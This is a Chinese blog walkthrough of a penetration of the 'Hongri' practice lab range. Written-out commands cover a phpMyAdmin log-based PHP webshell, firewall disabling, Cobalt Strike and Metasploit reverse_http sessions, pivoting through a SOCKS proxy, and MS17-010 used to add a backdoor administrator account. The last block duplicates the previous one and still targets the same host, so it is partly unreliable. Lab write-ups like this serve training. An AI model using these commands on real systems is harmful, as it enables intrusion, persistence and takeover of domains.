SugarCrash!

记录学习,想找个师傅带带我

0%

红日三

发表于 分类于 Valine:

实战于2021.9

1
2
3
4
5
6
7
8
红日靶场域渗透 
win7 web服务 
	ip:192.168.1.3 
	ip:192.168.52.143 
sever2008域控 
	ip:192.168.52.138 
sever2003 
	ip:192.168.52.141

访问的话是一个phpstudy探针,这个在信息收集里面挺有用的 一般存在phpstudy探针的话就存在phpmyadmin 或者phpinfo phpmyadmin存在并且密码是弱口令 root root 可以直接连进数据库 实战可以用扫描器扫一下他的哪个目录 phpmyadmin进去之后是直接可以getshell的 参考文章:

https://www.cnblogs.com/sunny11/p/13581470.html


1
2
3
4
5
6
phpmyadmin getshell 
知道绝对路径写一句话 
select '<?php @eval($_POST['hack']);?>' into outfile 'C:/phpStudy/WWW/hack.php' 
报错发现写不了 
SHOW VARIABLES LIKE '%secure%' 
SHOW global VARIABLES LIKE '%secure%'

1
2
查看这个变量 
secure_file_priv 为null不能导入文件


1
2
3
4
5
6
7
show global variables like '%general_%' 查询日志 
发现是关闭的,可以改成on开启 

set global general_log = on; set global general_log_file='c:/phpstudy/www/hack.php' 设置日志的路径 
select '<?php eval($_POST[hack]); ?>'; 
查询这个语句,他会被日志写到hack.php这个文件里面


一句话已经写入到文件里面了,直接连就行了

蚁剑连接
连接发现有个yxcms的目录应该是个网站
phpmyadmin里面也有newyxcms这个数据库 yxcms,如果知道有这个网站也可以搜一下公开的漏洞getshell
这个后台的模板也可以写入文件getshell

1
2
3
4
5
6
简单的信息收集
netsh advfirewall show allprofiles 查看防火墙状态 

关闭防火墙: 

netsh advfirewall set allprofiles state off




whoami是个高权限 msfvenom写个马可以直接system权限 这次用cs 生成一个马,上传,运行,cs上线

上线第一步,设置睡眠时间
cs没有回显的话,去cdn概述看看开发模式开还是关,把他打开
sleep 0
用z1插件的信息收集查看安装的补丁
第二部抓他的一个密码
有个是MD5加密的,可以去解密一下
为了方便使用,可以和msf进行一个联动

1
2
3
4
5
6
7
8
9
信息收集 
arp -a 
run get_local_subnet 
run post/windows/gather/arp_scanner 
rhosts=192.168.52.0/24 
补丁信息 
run post/windows/gather/enum_patches 
安装软件信息 
run post/windows/gather/enum_applications


开启3389服务,防火墙放行RDP规则 mstsc就可以开始连了
⚠️upload failed, check dev console

1
2
3
4
5
6
7
8
9
10
11
msf+cs联动 
新增加一个监听器 
msf 设置一个监听 
use exploit/multi/handler 这里注意要是http 如果是tcp是上不了线的 set payload windows/meterpreter/reverse_http 
set lhost 192.168.1.11 
set lport 4444 exploit 
cs右键目标,
新建会话选msf就行了 msf也上线了 
getuid 看权限 
getsystem 
msf内置模块administrator权限可以直接提成system权限



⚠️upload failed, check dev console

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
添加一个路由 
run autoroute -s 192.168.52.0/24 
run autoroute -p 添加上去后用自带的模块扫描哪个网段的存活主机 
run post/windows/gather/arp_scanner 
rhosts=192.168.52.0/24 
发现了存活的主机192.168.52.143 192.168.52.138 
background 

挂代理搞域控域成员 
use auxiliary/server/socks_proxy 
show options 
set SRVHOST 192.168.1.11 
set VERSION 4a exploit 
改完后看一下配置文件是不是自己的ip 
vim /etc/proxychains4.conf 

代理搞了之后信息收集了



信息收集,没有web的机器
做端口扫描
proxychains nmap -sT -Pn -T4 192.168.52.141
开放了445 也可以用cs的插件 选kb
直接用他给的编号打也行
通常打的17010 17010不光可以拿权限,也可以添加账户

⚠️upload failed, check dev console

1
2
3
4
5
6
7
8
9
10
proxychains msfconsole use auxiliary/admin/smb/ms17_010_command 直接用这个模块 
show options 
set rhosts 192.168.52.141 
set command net user hack lw147369.. /add 
exploit 
set command net localgroup administrators hack /add 
exploit 
set command localgroup administrators hack 
exploit 
添加进了administrators组了

同样的方法再拿域控

1
2
3
4
5
6
7
8
9
10
proxychains msfconsole use auxiliary/admin/smb/ms17_010_command 直接用这个模块 
show options 
set rhosts 192.168.52.141 
set command net user hack lw147369.. /add 
exploit 
set command net localgroup administrators hack /add 
exploit 
set command localgroup administrators hack 
exploit 
添加进了administrators